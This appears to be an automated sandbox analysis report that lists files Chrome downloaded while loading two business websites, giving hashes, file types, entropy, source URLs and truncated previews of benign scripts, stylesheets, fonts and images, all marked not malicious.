                                              SSDEEP:3072:Ts/NqiH30UHOxRtwU7VAl1qhTXOisdwvjKL+7C175pbmdIUM3SaLsGgKeFz9Pv2k:TsFbaRtwU7VAl1qhTXOTwvjKL+G17nbW
                                              MD5:38A9E58596C644102CCEEE1BF7EE9F62
                                              SHA1:408F4547B0D725FF0B2B034226121C218EC2C476
                                              SHA-256:0FC958F3E96D33DC3F953955B1192A90C9364F7A5E51AF1F323A91598B998A63
                                              SHA-512:DD6BE2E896E11F7F3579902E0154C7C4788371FA7A455523C068234881C962BE121831DFD83C0488877B4D944066199DD384020068924D3D2A5CB1784D146AB8
                                              Malicious:false
                                              Reputation:low
                                              Preview:google.maps.__gjsload__('controls', function(_){var QKa,mL,RKa,SKa,oL,TKa,UKa,VKa,WKa,qL,YKa,rL,sL,tL,uL,$Ka,ZKa,bLa,vL,cLa,yL,dLa,eLa,fLa,wL,AL,xL,zL,CL,hLa,iLa,jLa,kLa,lLa,mLa,gLa,FL,oLa,nLa,GL,HL,qLa,pLa,rLa,sLa,tLa,wLa,IL,vLa,uLa,xLa,JL,yLa,KL,ML,NL,BLa,CLa,DLa,OL,PL,QL,ELa,FLa,RL,GLa,JLa,HLa,KLa,TL,NLa,MLa,OLa,VL,QLa,PLa,RLa,SLa,WLa,VLa,XLa,WL,YLa,ZLa,$La,XL,aMa,bMa,cMa,dMa,eMa,fMa,YL,gMa,hMa,iMa,jMa,kMa,lMa,nMa,$L,pMa,rMa,aM,sMa,tMa,uMa,vMa,xMa,yMa,wMa,zMa,AMa,BMa,DMa,EMa,HMa,IMa,bM,JMa,CMa,FMa,OMa,MMa,NMa,LMa,cM,PMa,QMa,RMa,SMa,VMa,XMa,.ZMa,aNa,cNa,dNa,fNa,hNa,jNa,lNa,ANa,GNa,kNa,pNa,oNa,nNa,qNa,fM,rNa,HNa,dM,gM,yNa,UMa,mNa,BNa,tNa,vNa,wNa,xNa,zNa,eM,uNa,ONa,SNa,TNa,hM,UNa,VNa,iM,WNa,ZNa,YNa,$Na,XKa,aLa;QKa=function(a,b,c){_.Uq(a,b,"animate",c)};mL=function(a){a.style.textAlign=_.aA.zj()?"right":"left"};RKa=function(a,b,c){var d=a.length;const e=typeof a==="string"?a.split(""):a;for(--d;d>=0;--d)d in e&&b.call(c,e[d],d,a)};SKa=function(a){return String(a).replace(/\-([a-z])/g,fu
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (1728)
                                              Category:downloaded
                                              Size (bytes):100448
                                              Entropy (8bit):5.479146671020334
                                              Encrypted:false
                                              SSDEEP:3072:Ts/NqiH30UHOxRtwU7VAl1qhTXOisdwvjKL+7C175pbmdIUM3SaLsGgKeFz9Pv2k:TsFbaRtwU7VAl1qhTXOTwvjKL+G17nbW
                                              MD5:38A9E58596C644102CCEEE1BF7EE9F62
                                              SHA1:408F4547B0D725FF0B2B034226121C218EC2C476
                                              SHA-256:0FC958F3E96D33DC3F953955B1192A90C9364F7A5E51AF1F323A91598B998A63
                                              SHA-512:DD6BE2E896E11F7F3579902E0154C7C4788371FA7A455523C068234881C962BE121831DFD83C0488877B4D944066199DD384020068924D3D2A5CB1784D146AB8
                                              Malicious:false
                                              Reputation:low
                                              URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/controls.js
                                              Preview:google.maps.__gjsload__('controls', function(_){var QKa,mL,RKa,SKa,oL,TKa,UKa,VKa,WKa,qL,YKa,rL,sL,tL,uL,$Ka,ZKa,bLa,vL,cLa,yL,dLa,eLa,fLa,wL,AL,xL,zL,CL,hLa,iLa,jLa,kLa,lLa,mLa,gLa,FL,oLa,nLa,GL,HL,qLa,pLa,rLa,sLa,tLa,wLa,IL,vLa,uLa,xLa,JL,yLa,KL,ML,NL,BLa,CLa,DLa,OL,PL,QL,ELa,FLa,RL,GLa,JLa,HLa,KLa,TL,NLa,MLa,OLa,VL,QLa,PLa,RLa,SLa,WLa,VLa,XLa,WL,YLa,ZLa,$La,XL,aMa,bMa,cMa,dMa,eMa,fMa,YL,gMa,hMa,iMa,jMa,kMa,lMa,nMa,$L,pMa,rMa,aM,sMa,tMa,uMa,vMa,xMa,yMa,wMa,zMa,AMa,BMa,DMa,EMa,HMa,IMa,bM,JMa,CMa,FMa,OMa,MMa,NMa,LMa,cM,PMa,QMa,RMa,SMa,VMa,XMa,.ZMa,aNa,cNa,dNa,fNa,hNa,jNa,lNa,ANa,GNa,kNa,pNa,oNa,nNa,qNa,fM,rNa,HNa,dM,gM,yNa,UMa,mNa,BNa,tNa,vNa,wNa,xNa,zNa,eM,uNa,ONa,SNa,TNa,hM,UNa,VNa,iM,WNa,ZNa,YNa,$Na,XKa,aLa;QKa=function(a,b,c){_.Uq(a,b,"animate",c)};mL=function(a){a.style.textAlign=_.aA.zj()?"right":"left"};RKa=function(a,b,c){var d=a.length;const e=typeof a==="string"?a.split(""):a;for(--d;d>=0;--d)d in e&&b.call(c,e[d],d,a)};SKa=function(a){return String(a).replace(/\-([a-z])/g,fu
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (7711)
                                              Category:downloaded
                                              Size (bytes):326905
                                              Entropy (8bit):5.6062122189450685
                                              Encrypted:false
                                              SSDEEP:6144:04CypmFU7glq04d7z3KsOemve4NMX0fxnPk:dCbW7gQnhDec
                                              MD5:C8A1EFB5AD6963DE5CCEBFC791E6A831
                                              SHA1:72D19944469778F8374661D97462EF893AB9A039
                                              SHA-256:F75FEC0288D87A953B2975ABFE197FCD43F95026476FA0A8FE60FEA928EBFEFC
                                              SHA-512:B94B4BEA9E76010D86799E5E8F470B0C59F15E6EC8D95DD7D7B20ADF503ED6BCF44C6546C36CF4BFC2D1C842794E9DB6AE46C6A3BAAB336B984B2DCE233B4862
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.googletagmanager.com/gtag/js?id=G-0KG8DMQFJJ
                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":"undefined"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":15,"vtp_value":true,"tag_id":14},{"function":"__ogt_1p_data_v2","priority":15,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetVal
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):2960
                                              Entropy (8bit):7.9087022893027665
                                              Encrypted:false
                                              SSDEEP:48:gerB80dcvZdX4xjipmrCgOIu3L+7qJsxWPgvJxOd3ytqVLtgr0MSaB2:Pi0dKZdXYjiYGgOIuT34vJFt+tgAwB2
                                              MD5:63C71EFF4560B94271E10558C7B3200C
                                              SHA1:3FE96452347793D9B214516AF870BB0F4140CF70
                                              SHA-256:4F442AD4EC40D56413A8E9BC8CE3EF5A03EADCCD3FAEA58453ABF670D308BA6C
                                              SHA-512:B0365000CB2333FA194D49967AEB35A1E90F51A196BE72BD0449C08CA066D38731C71D10C27A99A6A41264D169A6068DC66287F9D60AC31E4249043716FCC09D
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/terms-and-conditions.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.....U....................................bg...cl........N.........ao.`e.............qs...........................~.........W].....~.lk........Y..v......IDATh.Y.{..U.dE.r.+5.,.Gy.@Bv....G.t.l...=2...:....!Q...b.+].PJ.?.v...7 ..v......N...7..$.(@..$......w$n.....I.%..R.G.Q7..\<~.$...1...q.@2.....EI8.a....7O?.....m......#..dq.JB.........x&...".%0..[..(....$.........i...U.d..V.Ri.Y.g......bm-.c{.Qp&.d.a.._y.K.a....:.\SgY=.N....ZZ....M.F....5 .,..J..|.....*...3z..Wy...%.Bh....yu...\..JZ....x...8..U...^..$]v..U.....3.........v...t.m.)>...s.,..*......p.._Y"D,.+.k..../...x..k.m:g..&.>.z.]2d?..>w...[ba.....;.+.T.y..8WJ..6M.M".....#&8.T.....jc.uJ.U...q..]...ut*./....%.7.m1R~L-|..).be.-.Z.;c.*\...z.............e..e=d..5dQ.C..~v#.9.=...*k.1.,.t.M..%...>..#Y/.s......$....Y.].I.|.t.k...69..=..ad..w$...~....."....HX..^.u.:l..g....Y...BX.)oI....?...H..@....,)..j..].....X.a....c_B...L.u........(!........,
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):10997
                                              Entropy (8bit):7.498153596066984
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwI78WPhoZ/ZgV1tSdDD/3sZu42iUZc+zmbB1EeksONRsA1:4YNg7CjhfSdDD/3sZu+WOCeONGW
                                              MD5:11E36F010A96EA86CAB102C86779FFB2
                                              SHA1:6B36B88B94D883E03067C30DC5563E6DE970C1C8
                                              SHA-256:90E23BF75DAEB2B1A86137E13C6A7B99A0E65251C6F449BAA33A56792A1FFFE7
                                              SHA-512:EF177EC1B4B4AEFF775429E0EFF0CCFEFEDA8BDB732F69B3953FD63B6F272C0E3635A91DBD2B3632FAA5BCD53522F49E18C0068C17287E5E5BF836D0C67B98D1
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):20270
                                              Entropy (8bit):7.792719823244924
                                              Encrypted:false
                                              SSDEEP:384:4YNg7W1oO1ttlTwBNPTvCGOoP+ieyk9MUn/7CCsmEz:4Yy5O/3GPTCGOoPVQ9MUn/gmEz
                                              MD5:97553796FA26EC8B37786B02FCDFD013
                                              SHA1:75D574E7ACE87AD01FA5D4ED46B15DF55D3529A2
                                              SHA-256:E1E3F357A08EDE1767F49675EE40C178A12F3F3A712FC9996BE871F6A95C277B
                                              SHA-512:B22A7F9F4809CEFCFF13D939861EA44F0C1A1734E533396159D044F5220B5620FCBA02536AA8EDAE6B1E8F144EA1A09494B5913BD65E6B9CDE2F91640E4F090B
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/25/fd44eb6a5f7ee9bdeaaf121d22595ebe.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3646
                                              Entropy (8bit):7.941021163218674
                                              Encrypted:false
                                              SSDEEP:48:K83eV+Dy1R9caUyAdnIjwJP1x60RsaGQ05CnlxwC+UgGQmb9GSHT5Bu/j27HUNgq:rusLaUp8Q1xqDUlj+UbbnHQKMgr+
                                              MD5:784E1E5511461376FC21971534AB22A9
                                              SHA1:187930D08CC1C1BC47BD24F38F5F52F2082DBF7E
                                              SHA-256:81CE28A24477D2E8E80F07C2247151D479FAFA52AB59B2D3AADDECBE22FA9894
                                              SHA-512:25896AD98A3B4D4E0BA7C23D3C458D89ECC86107BCA2B57A4ADD1B60E9D993CEFB2D97B67DB9F7BAA96FC9105BC279F2F29221F233DC49C06551E1AE9E052694
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...APLTE....PyR]........R|..........<`.;[....7a.......?e...............PY...............F...............Jr....T....PZ.<...U....L...B\...1^.'Vv.......S..K.....TlP..?...3T.................nv.T\.v..IQ.\e.2t.Fs.......[..]Y.x......MNT.....`...s......2..e.w.6m]V.a.....EJ....k...v.e.._..Z..A..@.....r...o..`....!O...K..T..m(Yz.....IDATh.X.[.l.MH!@...H..%....((..-...Vm....}......L...Q.....d....X....x.o.6...7.e.9....R.\x.......W_]....0yb*.S3.Zqq..Xl..D ...o^-l...n.^..N0L.E..K.%..3.-..E...C.v;.K.!..OV4...V..(...,.n.....Z.a..vA.H(D.~.BX.....W...+....*5...-...-.`...*..,_b.0Xe..q.....X;.UKd.Q......{5.`.(.1..z.$$....6..8.~..i]..Z..(....h..F...%=..'w.....1.....R!.JF.P.78R...z.........e.!7....T....K..].<6paIO.6.j.B.p.P..b.3...4...?n?.(.F.......Ly..y..D.-~x||..i.v".$..!.......?.R.........(-..@"..{...+d.U,...;..`..................f..%cB%.9...(...._d..7.........Nl....R.O<q@ja.+.r@....A.@..../&]....'".z....I........_..e.F....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3882
                                              Entropy (8bit):7.880510028903841
                                              Encrypted:false
                                              SSDEEP:96:AEEcXfff/XWov1AiFzX/GR2tsQwX6Gpn3+PW:wWfff/WovVFTGR2Gh9pn3f
                                              MD5:D688D3229A17F1295B6653FD1CE362DF
                                              SHA1:B90B58962AC45BC4EAF506BE9383E709844D716F
                                              SHA-256:18E45F055EB19AB605C846E37B142AA8C596CDC34E834BB9787DADD7828C97AF
                                              SHA-512:A5FF6E92F8CB151D1931A7CA74F7D16FB97544D31CE49418F610F6047DFDA24D98709C8787D09F2EFE021B60FC4E078923FF33F67D97406DFDF2D65368E74B79
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/8.png
                                              Preview:.PNG........IHDR.......P.....9.......PLTE...............................................................F.....L....R..W..]..c.._.....H..h..Y..x..k...................M..p.............). .O..r..}.....e..............#.v.....J..n.@.O.&.........#.T.........`.l.. .1../....u..`....p.{P.]..,.....M0.@.....G..........5........3..........U..R..A..0.........p..........@tT..C..=.X..|...................`.p..X..9.........................@.S@.S@}S..A .3.........P.b..a./......................f@yT@.Q@.P@.O0yE c7 .1.r'..&.......................p.~..x`.oP.aP.]@.Q..M0.D0.@ k7 .5 .1..%..$..#..#............p.}p.{p.{`.o..n`.mP.bP.`P.`..X..W@.R..N..N0nF0.C0.@.W).R).](.....`.l..]P.].:..5.f(.m'.}&..^.....tRNS....@. ..P.0.`.p...%,.3....IDATh...K.q...ts...9..v.6-..;r...2.-..m.U,............(.:....(..zPQ........vt.l...xm.|.~....O..C.@(...|..$_ ...9"......d...-.e........ ...v......n^x~.2..)..O.4.......n.....8..t..!.paee%....P.`..t...K.......I
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3640
                                              Entropy (8bit):7.752392676330971
                                              Encrypted:false
                                              SSDEEP:96:Q2rmW2ujbX4yWPfaDqIZ0xH5udZDiPRx+:CsNWPfaufxkNiPRx+
                                              MD5:42DA221D144643E221DFA53EC8CC6063
                                              SHA1:355252120438998CCFF910F511520FE9728CBAAA
                                              SHA-256:CA16AD988BF26AC254415896E15B39D56EB886830373FA46A1FCFC200A7FC59E
                                              SHA-512:642D6FC3D4B5E58F5CBB8342353733A5838A374C6A24F984122CFA70F507C3C8854D39B9495AFA5828C0F3880C591531B59165CC6C14253061DEF6E99B73D172
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/15.png
                                              Preview:.PNG........IHDR.......P......N......tEXtSoftware.Adobe ImageReadyq.e<...AiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.0 (20230801.m.2265 3a00623) (Windows)" xmpMM:InstanceID="xmp.iid:922B77E2352611EEBA79C9597ACFE4BC" xmpMM:DocumentID="xmp.did:922B77E3352611EEBA79C9597ACFE4BC"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:922B77E0352611EEBA79C9597ACFE4BC" stRef:documentID="xmp.did:922B77E1352611EEBA79C9597ACFE4BC"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.$......IDATx..]..VS.?...P..B3Y...B..+kh..${..%.F#..T.... m.......G...d}O........v..s
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):12256
                                              Entropy (8bit):7.577923956488213
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwRie9H1JXG8JfATBWcZGbCQwrVqD9xLpOyS36NU490EDIyws:4YNg7R5l3HcZzRhM9dp/+49SI
                                              MD5:FD82374E9DB17F8399728273964C739A
                                              SHA1:EFD25C958BFDA9D562C396C0A1D91BEDFB20C104
                                              SHA-256:8B66B9E78471EC5BD907A40DFF04731107586F34F2E986E9B8E5739EB603BEB1
                                              SHA-512:ABA20221FD099165407A8506D20E9AAE21D03C6B36D1545E1C2DDAF435D591559E358AD19564F3F76C3F1866A3C99006016836498BA3A07ED8437A7DCAE1D041
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:downloaded
                                              Size (bytes):253007
                                              Entropy (8bit):5.086220683157591
                                              Encrypted:false
                                              SSDEEP:1536:Mkgecc52VR4gtxu6k7dZjYIwCNHzxeiB4sh0nRcXWurOV/WNcoll2dBH/RcCa2BQ:qecc52VR4gtfj+LwjLpJE
                                              MD5:D316C01710A6E48CBB3DD4C45F1C32F6
                                              SHA1:4CE20A43041B6898CECDC717EDF9E21DDAD39CA8
                                              SHA-256:9532BD0831F5698AE505F7518203C3E8CE45AED742D34AB9CE9B34BC0D34D573
                                              SHA-512:2DF23EF3A7B428E8CF544147A45612961E5A28D1BC5DB88230A1E8E12234D826928946B333192809B3221B8ADEC745148F0F25F68B401E30CF9B77A4D7B1FEC3
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/css/style.css
                                              Preview:.b-0 {.. border: none !important;..}.....h100vh {.. /* height: 100vh; */....}.....h1, .h2, .h3, .h4, .h5, .h6, h1, h2, h3, h4, h5, h6{.. line-height: 1.3 !important;..}.....bg-0 {.. background-color: #fff !important..}.....bg-1 {.. background-color: #EAE4E9 !important..}.....bg-2 {.. background-color: #FFF3EA !important..}.....bg-2-opacity-80 {.. background-color: rgba(255, 243, 234, 0.8)..}.....bg-3 {.. background-color: #FDE2E4 !important..}.....bg-4 {.. background-color: #FAD2E1 !important..}.....bg-5 {.. background-color: #DBECE5 !important..}.....bg-6 {.. background-color: #BEE1E6 !important..}.....bg-6-opacity-30 {.. background-color: rgba(190, 225, 230, 0.301961) !important..}.....bg-7 {.. background-color: #F0EFEB !important..}.....bg-8 {.. background-color: #DFE7FD !important..}.....bg-9 {.. background-color: #D1ECFD !important..}.....bg-10 {.. background-color: #dceaff !important..}.....bg-gray-100 {.. background-color: #F2F4F7 !important..}............
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (724)
                                              Category:downloaded
                                              Size (bytes):3487
                                              Entropy (8bit):5.373569985049004
                                              Encrypted:false
                                              SSDEEP:96:rPxgYZpBnecBii6nz1hAf3UUvz6+Ze1WP1dX5n:TxgYZGy6zTOXL6Cekv5
                                              MD5:5A9ABF02F5823F5A50F6B022A9FEDC3E
                                              SHA1:C1C9B68A1943FBF6E41FB8A848069102337B5ABF
                                              SHA-256:37F2F9F0E0D75497FE736BD0022FAFA40EEC0E9575A0E50128C8FA2DCFE01A63
                                              SHA-512:63C0CB51BB815B52BF199BF1F7A77FA3B818B8CE89545314670E8B394CD322A73270F1FD53F4DC7EAA0E4C1B06BF21936CE6768270530B6C116978B80A964A89
                                              Malicious:false
                                              Reputation:low
                                              URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/overlay.js
                                              Preview:google.maps.__gjsload__('overlay', function(_){var Oya=function(){},EC=function(a){a.uA=a.uA||new Oya;return a.uA},Pya=function(a){this.Eg=new _.om(()=>{const b=a.uA;if(a.getPanes()){if(a.getProjection()){if(!b.Hg&&a.onAdd)a.onAdd();b.Hg=!0;a.draw()}}else{if(b.Hg)if(a.onRemove)a.onRemove();else a.remove();b.Hg=!1}},0)},Rya=function(a,b){const c=EC(a);let d=c.Fg;d||(d=c.Fg=new Pya(a));_.rb(c.Eg||[],_.dk);var e=c.Ig=c.Ig||new _.xsa;const f=b.__gm;e.bindTo("zoom",f);e.bindTo("offset",f);e.bindTo("center",f,"projectionCenterQ");e.bindTo("projection",.b);e.bindTo("projectionTopLeft",f);e=c.Kg=c.Kg||new Qya(e);e.bindTo("zoom",f);e.bindTo("offset",f);e.bindTo("projection",b);e.bindTo("projectionTopLeft",f);a.bindTo("projection",e,"outProjection");a.bindTo("panes",f);e=()=>_.pm(d.Eg);c.Eg=[_.bk(a,"panes_changed",e),_.bk(f,"zoom_changed",e),_.bk(f,"offset_changed",e),_.bk(b,"projection_changed",e),_.bk(f,"projectioncenterq_changed",e)];_.pm(d.Eg);b instanceof _.Gk?(_.Vk(b,"Ox"),_.K(b,148440)):b
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (43610)
                                              Category:downloaded
                                              Size (bytes):46174
                                              Entropy (8bit):5.613451807456783
                                              Encrypted:false
                                              SSDEEP:384:FvrK5XUVkt9HUHGQQ1q7vepKyDBUgwnwM4aGLZlS/dDZM6c7VY+nlKaDvAJC5LDG:N+MktAwJcbMSWNs741uuZMmJ1j5KOLeT
                                              MD5:7419D08BBF4250BFEC1EB4670D5A448A
                                              SHA1:BBAA5D68BDB2E1CD531D18171A55A07DE761D19B
                                              SHA-256:A19AA0DF3B7974028724B2666D8311A226ACEDC65A90947C7BC56EECB9A367AD
                                              SHA-512:CC89C5175EEA04556FBEF16921F781CE8ED38FBFAB4312DE4C90E66F18C1CF9FF322BF3D6156D335E94D85D4D3FBF0C2AF1A15CC17943D5149B1CCCA6C1EEC7B
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/js/chroma.min.js
                                              Preview:/**. * chroma.js - JavaScript library for color conversions. *. * Copyright (c) 2011-2019, Gregor Aisch. * All rights reserved.. *. * Redistribution and use in source and binary forms, with or without. * modification, are permitted provided that the following conditions are met:. *. * 1. Redistributions of source code must retain the above copyright notice, this. * list of conditions and the following disclaimer.. *. * 2. Redistributions in binary form must reproduce the above copyright notice,. * this list of conditions and the following disclaimer in the documentation. * and/or other materials provided with the distribution.. *. * 3. The name Gregor Aisch may not be used to endorse or promote products. * derived from this software without specific prior written permission.. *. * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS". * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE. * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FO
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Web Open Font Format (Version 2), TrueType, length 109808, version 772.1280
                                              Category:downloaded
                                              Size (bytes):109808
                                              Entropy (8bit):7.990726638724642
                                              Encrypted:true
                                              SSDEEP:1536:598+segXMbYt4ZF+jfdgY0q+JtV63kYFF8ChI+2F2aqQPj+QU0yXbO/YvSdE:AeeemxT+kkgeChI+20aqqDhcSK
                                              MD5:005C9AA92B564B73B7582CC4F1FA49CB
                                              SHA1:373361ED756B1FE68CE2F5968D467826B6973BB5
                                              SHA-256:FAAE6FC0AA94CC5BDE5076647C817A23206096A1CBEDA10D1C6F3D89D6163ED1
                                              SHA-512:CF057683226D25FAB8518295D9A2BBC7261B85A0E911D323F949719B6484BEB99843887AC634E58F21988C5AF3B8D825B8289CBFE29B2D4E1817016BE1499BBA
                                              Malicious:false
                                              Reputation:low
                                              URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/webfonts/fa-brands-400.woff2
                                              Preview:wOF2...............l.............................8.$. .`..$.....|.(.. . ..fq..".....~..:......!!.T5..?.........e`...e;........}N..'.~..*.F..QV...7..E..........(.a$9u.%....|j... v..n..........v.lz..t...}..~.....1.XJ...-[...K.....,._...Qw...G..8..9.E.'\.:of4#.Y@iW....J.@....}d..3Q.M....C...\..v.).r.)..\........;..k.6;........>..I..k..~.8.0.A.X>...?h.R....B..%.....i........WUW.......Q..Y(!.I(.B.EFB2.m..ad..6J...0..Yo;.5..!c9$..3..W.@Xk.J...{,.~.35..}Y.......d....v6....r.^fE.eu/......"....n,.......0.....r..pDE.....3?..nF.l......jR&...&e..7......92.../rH.12cdW.NZ..)...K-V..+-v.1....h.B....1....| ...L..../...a..i.{.}.i....i.J../..M.<..&...}..c......QM.Y..?.....-..t&.$.)>.......o..?.....c....Zq...R.q...Ww...g.'.....W......E.8o....I.Rn .....l{.g...%...LWK...M..3..z]..8.\..Y.G.N......@.9..m.(..{....\U.....[B......;^..^.V.=.._-kB.<..I.....H.....'...S.@!...s.H..c.vr.{.R<T.\C.B~<O.|../Ze...|.<..'?.U.V>7.Y...I5.uh..//...2Di1x..K.'m......i...,.qoIn.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):17877
                                              Entropy (8bit):7.75188401813859
                                              Encrypted:false
                                              SSDEEP:384:4YNg7fYRYMpf/FCER7pqjk39K8ThICXDlb+niOHBneD:4Yyb3Mpf/UEKO9tiCXDF++D
                                              MD5:15A1BFF5ECE221C213CC97478CD07C45
                                              SHA1:8D33FD40A0613B12C4F647A2CDBFFDD85DF6BAAE
                                              SHA-256:007A1B9A7A05EA2DC30DF7131D58BC79D657282B2B2B4DCDACBA120566B27187
                                              SHA-512:2A72F80CD9CCFDD180938E36A034AC0F607FD0281B4AEB311BE2E5125AF1B743171AEEDCE6DB887586E8490BA0C876CDDA0F78CC9DED382AF128EAD3C71E5236
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/58/538a6bfadd8dad839741accbf18fcdff.jpg
